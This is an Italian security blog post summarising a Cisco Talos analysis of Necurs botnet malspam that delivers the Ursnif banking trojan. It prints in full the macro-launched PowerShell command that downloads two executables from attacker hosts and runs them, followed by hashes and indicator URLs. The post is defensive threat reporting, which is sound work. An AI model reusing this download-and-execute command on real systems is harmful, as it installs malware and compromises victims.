Il Team di Cisco Talos ha condiviso l’analisi della nuova ondata Malspam della Botnet Necurs (link).

Quest’ultima è sicuramente fra le botnet più attive al mondo, in grado di generare enormi quantità di Spam. Le mail malevole inviate contengono Ransomware e Trojan Bancari (Ursnif, Panda Banker o Emotet).

L’apertura del documento malevolo e la conseguente abilitazione del contenuto (abilitazione della Macro), avvia il processo di compromissione del sistema.

Di seguito una breve analisi del Malware bancario Ursnif:


L’allegato malevolo risulta essere un file doc dal nome: [NOMEAZIENDA]_Richiesta – [Cognome dipendente].doc

L’apertura del file e l’abilitazione dei contenuti permette  l’avvio del codice malevolo, in particolare è avviato un comando Powershell con i parametri:

$VeZynUhagoWemyROVeJ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(“aAB0AHQAcAA6AC8ALwBjAG8AZABlAHIAbwBuAGYAbwBkAGEALgBjAG8AbQAvAGIAcgBlAGUAcABpAHQAYQBsADIANwAvAHkAeQB5AGoALgBnAGUAcgA/AHYAYQBzAHkAZwBhAHIAdQBiAD0AdwBpAHoAYQBoAG8AegBlACYAYQBhAG4AaQB4AG8AaAB1AD0AawB1AGsAJgByAGEAdABhAHgAPQBoAHkAaQB1AHMAaQBwAHUAaQBhACYAcABvAGMAYQB4AGUAbQBvAGsAPQB6AHUAJgByAGUAdwBpAHgAeQBkAGEAPQB0AGUAZAB1AHMAbwB6AGEAbQA=”));(New-Object System.Net.WebClient).DownloadFile($VeZynUhagoWemyROVeJ, $env:APPDATA + ‘\valabyhuh.exe’); Start-Process $env:APPDATA’\valabyhuh.exe’;Write-Host “bAbYgiramOpEPY”;$iARAPUmOPaJeS = New-Object System.Net.NetworkCredentia

l(“lUpIaaKAXuqexOGybu”,”lUpIaaKAXuqexOGybu”).SecurePassword;(New-Object System.Net.WebClient).DownloadFile(‘http://91.210.104.247/porn.jpg’, $env:APPDATA + ‘\stat.exe’); Write-Host “FYFopIsYpUjurof”;Start-Process $env:APPDATA’\stat.exe’;$jOCOdeFOLUXALoNA = “nuqoLuSAwEjOdE”,”iiQOCOhERiJYsyie”,”qIhyGAtYlebimycuaUf”,”bYtURYGunUtiKe”,”pazuWeXOQoFIzIQUaUhe”;Exit;

Il codice eseguito avvia il download di 2 file eseguibili:

  • valabyhuh.exe
    • MD5:       fa37eb66b10eb030e777af9420ffce9a
    • SHA1:     92b86fcdb6bc0fcdbb60478e41456d5b565410ce
    • SHA256: 856e8c8716fa5afac747efcd8acfe1488c703f1b8620dd567b2b7543458c5d69
  • stat.exe
    • MD5:       2ca1f87a624245db0a57bf439b71d460
    • SHA1:     2f6de1b66d8021b74ebcee0040b9a7c00b61d231
    • SHA256: 06af68780ff670177daf0d6e34918976a46f9e69787a284b8757470fb02903b3

Traffico di rete generato:

Indicatori di Compromissione:

  • http:// 91.210.104.247/emotet.txt  (GrandSoft EK related)
  • http:// 45.227.252.241/linnealva/kitea.dlm

Take your cyber- defence to a new level!

Cybersecurity is of vital importance in today's digital landscape. Our innovative and tailored solutions provide impenetrable defense for businesses of all sizes.

More info here

Related articles

qr code phishing
In the ever-evolving landscape of cyber threats, threat actors are constantly seeking […]
Risks and Solutions How to protect and how to react The identification […]
fickerstealer
Over the last week (26th of July 2021), CERT-AGID observed a malspam […]